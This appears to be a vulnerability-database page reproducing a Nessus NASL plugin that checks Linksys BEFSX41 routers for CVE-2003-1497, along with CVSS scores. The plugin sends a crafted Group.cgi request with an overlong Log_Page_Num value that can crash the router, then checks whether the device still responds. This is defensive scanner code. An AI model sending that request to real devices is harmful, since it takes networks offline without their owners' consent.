Lucene search
This script is Copyright (C) 2003-2022 Matt NorthLINKSYS_DOS.NASLHistoryOct 16, 2003 - 12:00 a.m.
Linksys BEFSX41 System Log Viewer Log_Page_Num Variable Overflow DoS
2003-10-1600:00:00
This script is Copyright (C) 2003-2022 Matt North
www.tenable.com
34
CVSS2
6.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:M/Au:S/C:N/I:N/A:C
EPSS
0.01
Percentile
83.8%
The remote host seems to be a Linksys EtherFast Cable Firewall/Router.
This product is vulnerable to a remote denial of service attack : if logging is enabled, an attacker can specify a long URL which results in the router becoming unresponsive.
#%NASL_MIN_LEVEL 70300
#
# Linksys EtherFast Cable/DSL Firewall Router
# BEFSX41 (Firmware 1.44.3) DoS
#
# Changes by Tenable:
# - Revised plugin title, changed family (1/21/2009)
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(11891);
script_version("1.22");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2003-1497");
script_bugtraq_id(8834);
script_name(english:"Linksys BEFSX41 System Log Viewer Log_Page_Num Variable Overflow DoS");
script_set_attribute(attribute:"synopsis", value:
"The remote host is vulnerable to a denial of service attack.");
script_set_attribute(attribute:"description", value:
"The remote host seems to be a Linksys EtherFast Cable Firewall/Router.
This product is vulnerable to a remote denial of service attack : if
logging is enabled, an attacker can specify a long URL which results
in the router becoming unresponsive.");
# http://web.archive.org/web/20031110012408/http://www.digitalpranksters.com/advisories/linksys/LinksysBEFSX41DoSa.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b9f768be");
script_set_attribute(attribute:"solution", value:
"Update firmware to version 1.45.3.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:N/I:N/A:C");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_cwe_id(119);
script_set_attribute(attribute:"plugin_publication_date", value:"2003/10/16");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/h:linksys:linksys:befsx41:1.43.3");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DENIAL);
script_family(english:"CISCO");
script_copyright(english:"This script is Copyright (C) 2003-2022 Matt North");
script_dependencies("find_service1.nasl", "http_version.nasl");
script_require_keys("Settings/ParanoidReport");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("http_func.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
port = get_http_port(default:80, embedded:TRUE);
if(http_is_dead(port:port))exit(0);
banner = get_http_banner(port:port);
if(!banner)exit(0);
if("linksys" >!< banner)exit(0);
soc = open_sock_tcp(port);
if(!soc) exit(0);
req = http_get(port: port, item: "/Group.cgi?Log_Page_Num=1111111111&LogClear=0");
send(socket: soc , data: req);
close(soc);
alive = open_sock_tcp(port);
if (!alive) security_warning(port);
Related
openvas
openvas
LinkSys EtherFast Router Denial of Service Attack
2005-11-03 00:00:00
LinkSys EtherFast Router Denial of Service Attack
2005-11-03 00:00:00
cve
cve
CVE-2003-1497
2007-10-25 19:00:00
nvd
nvd
CVE-2003-1497
2003-12-31 05:00:00
cvelist
cvelist
CVE-2003-1497
2007-10-25 19:00:00
CVSS2
6.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:M/Au:S/C:N/I:N/A:C
EPSS
0.01
Percentile
83.8%
Related for LINKSYS_DOS.NASL